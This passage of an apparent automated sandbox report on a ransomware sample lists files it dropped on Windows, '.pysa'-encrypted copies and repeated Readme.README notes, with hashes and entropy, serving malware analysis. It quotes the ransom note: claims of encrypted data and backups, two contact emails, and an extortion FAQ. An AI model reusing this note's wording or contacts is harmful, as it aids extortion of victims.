                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.767453327328174
                  Encrypted:false
                  SSDEEP:96:0liC5RCl30owZSNIxMnFddZE14vWxX0lj2eLzEt23n:0R5s1lwm2qF3ZxJlj2MzEtu
                  MD5:67BA5DC97F431CC8F53BA54CF38F724F
                  SHA1:17483B44ACB384D58707600306D138947F587DD8
                  SHA-256:80CDD30C296321F91BFE8BC5D5555AE0A8838E6AAB1B8C6FB4B21EC4D2BA96C1
                  SHA-512:1ED14048924CC848F43A0714F693417A34B5E4CCF952B16CF3B82E65D119DE9BBBC3117ACB2EA89D1728CE644D6CBAA95B3CED950E081C835EDB5369D42FD152
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7845115763797965
                  Encrypted:false
                  SSDEEP:96:UKNvR4dMMU61df0BmAuMF3/cZVkJr2wVebBZdf+7qmtfeS:RGMNAJMF0UJr2wk+umhn
                  MD5:E70028FADCE0F5E7FCF97CA1C1245A04
                  SHA1:9186C599222E7DBD79E8E99948D687F4A94B1C9B
                  SHA-256:BC5D141B1C1AF2DEA3424025ED3AD4058E16BD94DC49724AD61DD4F2B1C5668C
                  SHA-512:32FB7B24D8256BE4774AD706520BD2C4780FA6E62EE0FC1C9B314C236CD1530E19B33A2F90C18BE20812F05B14DA27667081FDF298ECC6F4A4DF36EAC6E82203
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.787238817250694
                  Encrypted:false
                  SSDEEP:96:a/f/LAqczwMeD1U5lv/WcgdvD+Zpm51WwnBCSlN8:anTAqMwMeEvu1Ipm5nnBBN8
                  MD5:3C3E8B374532A4273169CE813E44EFAC
                  SHA1:6EA6E7AA186362EB42B8E600D29C30B1ABBC9AEA
                  SHA-256:A36EF2402CAD711524B5886D41310D5E50BA7D3707DA068C39A2E445B588E2C2
                  SHA-512:2A39C8A6A6245AA92D5063F66B43919688BDC5CBB4ABC712D79FFED924FD1D33CC95485AB665951371F1D89CBADFE911C94CF855EEE252B12D68E78E8E4CD432
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.761338834694348
                  Encrypted:false
                  SSDEEP:96:8urVXSVuu/3PpSYlfr0lzdoJRlEZ3iYW5PWKNbZ8/w3UM1rwLFheT:8Ggh/3haLMHEZfW5OKNIBMAheT
                  MD5:CFF48549756B64B626D6EEBA3829C937
                  SHA1:56C66F47B22D47F53FE8A10313B647DF3748033E
                  SHA-256:A8EF06A2F9EC6FD5BC2B31B8A4E7B6A88CFAAADA340A1BB8B393656ED5A8809E
                  SHA-512:1B1EEBAAA19B87DCA86F37D482C8141461169499384699AD677A974D87945B461232FC345ADA369484C30DC1E3B4883DB82E1173CE55AA8D216E94C1DEE78BAA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.783132220636022
                  Encrypted:false
                  SSDEEP:96:5BTAxFpuyvu0qDy+GjoR/V7hdch8Bzt2M:rAxbuxyt+/x/Y8fH
                  MD5:CAE228CCC1ABD54F9E7566FD98CF29CC
                  SHA1:657462FA2C856583E7A0059E7298D64689476AA5
                  SHA-256:E4EA8BD9AD5B43507AEF8F13DDCFAC3CC55DC3756D3B2EED58CF60B9F0E537E9
                  SHA-512:B27E8D43ED374DB8D676EEBFFDD0DD7A0CBAF1F8C875961AEDD5313A94C4EBA93B5FE116CD76ABB1AE6C4502E8C4A4844887430CDB1EFDBAB3227BE93ED9B2E3
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.759120556301159
                  Encrypted:false
                  SSDEEP:96:Q/ULDjQocbYc0SS2UItbKYv9zgvWfVJr2jNAmif8naFGkGD/:DL3uYjSS2HbKczhzr2jC8nA07
                  MD5:E872D79E905144AEC13EB6B98FD4E88D
                  SHA1:81D306D032F2235154DE5C006ADD689D171C3954
                  SHA-256:7D9F1D42582F21947EB165524958E52E9C14C0AA2C6F7A4B8A804CFAFBE568A4
                  SHA-512:0BB1B50339C24F182CD5F9EDD9D5DA83C35D15AEB1B444509994782D8E14BFA06861252EBF992D970D6D4085BF6D1FD4B711C622A947151E2FE8BDC2136C4171
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055192583222839
                  Encrypted:false
                  SSDEEP:48:vSDyijYex7QLNwRkmi2jCMR7BQcVCKSNr3hKd3PpXN3zZZQyXZEzng+kqPzd1jUS:vqyFLSRkmiGycGNLcnXN3zRpyPnUj/Uh
                  MD5:D60FB52767B0D8FF0B9E31AD96605040
                  SHA1:72405B6EEE970055D5BD73010E0037B15C3A8FB6
                  SHA-256:736D89401DB1B5D2B06038269966D23D7E38D97EC7E3DC78E97137A096275F78
                  SHA-512:D66FA795639293D1233725E6330AEFCD46FAE7D3F32D1DB162295F5EBF7695F84E03DF07ED4FE1CCDA8D12C06CC03E0830945B6073EA00B50DF9FF8C3C4F24E8
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.789395737076546
                  Encrypted:false
                  SSDEEP:96:SGhXQtxgQVVcynnMRP2chRERO/QljELLuhbxIhxpXYM+0Q4/:SGhXmxgQ8yMZfQRcLuhVIhxpXYR4/
                  MD5:942CC9F256CE22498DA60374E67D89FC
                  SHA1:0924145B35E1269AB23BEC20492E1B6A0126D9A0
                  SHA-256:9A2A71BC112E50F1FEE7409D08AADAC2C1A4749ABD0E2F9AB2AF0BF26C018CE1
                  SHA-512:CB3D9C46AB4488FF0CA477600B9977DC83778F069FE33438D1B1F5207233ABEB879AE7F8FA1F2127DE12B6B6739BEDE4171563C10FA5129B1CDE94395691920A
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Templates\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Oracle\Java\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Oracle\Java\installcache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\Oracle\Java\installcache\baseimagefam8.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7098368
                  Entropy (8bit):7.999971620623606
                  Encrypted:true
                  SSDEEP:98304:rE3Hoh6HLgqNErEUi5VLk40A5V0UxM0K4NtYVV3okO9ZMa/57F6/Mfvw7UmUL1nG:rEHcqGi5VhV0J0K4HYVxOLMaxtvV/tbs
                  MD5:03C6AEE1777EAB883D755B36DC72A5A8
                  SHA1:83F216D4E079D51105AFE73CAB5111D88B2C1951
                  SHA-256:AE6493C60A5C811B4D67AF91E47B050C8E73B1F1885151A55EF0457F9BF8ADDE
                  SHA-512:A2AEDBE671C5EA13E2C7EBC08731DDF26B76F20FDD55A2D91890D00C2DB4C9B1A7AFF7B2E6258ADAB74172D76F1DA97EFC1968D3F1CD86523E3BCC62B07F7102
                  Malicious:true
                  C:\ProgramData\Oracle\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Package Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5634048
                  Entropy (8bit):7.999964412248206
                  Encrypted:true
                  SSDEEP:98304:c5iHJw5b2YPIkfh1Twaem1QfxlEQUbae9uyIukfgqsDbVAZBzO0/bKs8:LJw5b2yIgh1TDemaxYV9u9jfgqeCfbKr
                  MD5:E66771E55D8FE9D66DC912BE5A7B6D58
                  SHA1:A22F81ABBE748692F333FC4D917687557F240E27
                  SHA-256:328A7D31CCAD944D7C3645A04025B69753695087D23DDC014DE2AE6CC058A80E
                  SHA-512:94A2D8DC84CDB2AAE1D5522DC1D1317DED04B5BFF9C692AB09F986494B3569CC1715FDB1300B3C5868E5F3347A89BB35CB2F665BAF2BA8E44C614459B1EE5460
                  Malicious:true
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994605552116207
                  Encrypted:true
                  SSDEEP:3072:kU40+zz/gAGa/8MPYyFUt23D6V+DJDpQRSiGA/j5:940+bGA8MPdhmWniBGA/9
                  MD5:38DF5C58F939EB329473CCC063C0234D
                  SHA1:AC193949802394F541CBF94AA59145AA843A23FA
                  SHA-256:015B164FFCF253770A4B2DEF00493C411B450B260A68DEB2848CF221F62E5874
                  SHA-512:531380B966A6B08896414A1E557EDBDD8BE73BB833F77AFC953AD2F8BB559968FB720DE4101CC9DD929FE7CC8424BDACB550D81B2B93250E164303E26B0FCF6C
                  Malicious:true
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999779671757323
                  Encrypted:true
                  SSDEEP:12288:PaSUtpHu87bCiMJKgygnNnHaflOoJ//7j+WAnXtuAAtUp5i235uuHyq3GLwx+Pwb:NUthdbCBEHg5SRJrlstWCpOLw6Ag5Xo
                  MD5:E3B3C79AB7FD62DDA8F114A33F0C1982
                  SHA1:0D84C74A1FD7664B6023D3D1AE890B553C03E5BA
                  SHA-256:2C91C0EDE4BC31010E9F0D91AE5ED81303AE3F832B05B6EE3DF60B786FFA4247
                  SHA-512:8248E6E2E187BD1298912EC73FA0B1578B2246E8BD867C3BEC309ABD992DEDC8EF212E2E7293C6B3100074E9B24250B139004544FEB7C8FEB1E2BA9B8E13F4A2
                  Malicious:true
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.99460835002454
                  Encrypted:true
                  SSDEEP:3072:epICAl7OaufZcBWDVgbpnXEJgIQTYMyAs:euK+0eFUJgIIyAs
                  MD5:ED35F736191F1CE2D6EFA00408FFF376
                  SHA1:3F0DFFDB5CE3B1EA9726B49359BE1C0A131F8255
                  SHA-256:0D2EF53D82AD5A808A88A89543C576B6170A4EB25F2D140864BE7E5D9C06449F
                  SHA-512:8CF5D8FF74A8092DE252F5CAEB1D5DA2E5511262AFC8F512ECF6203CDECF7EED40398406A16BBA24BCB73BA86003374DC2D1ED806BDDDF8983E6661B141432EB
                  Malicious:true
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
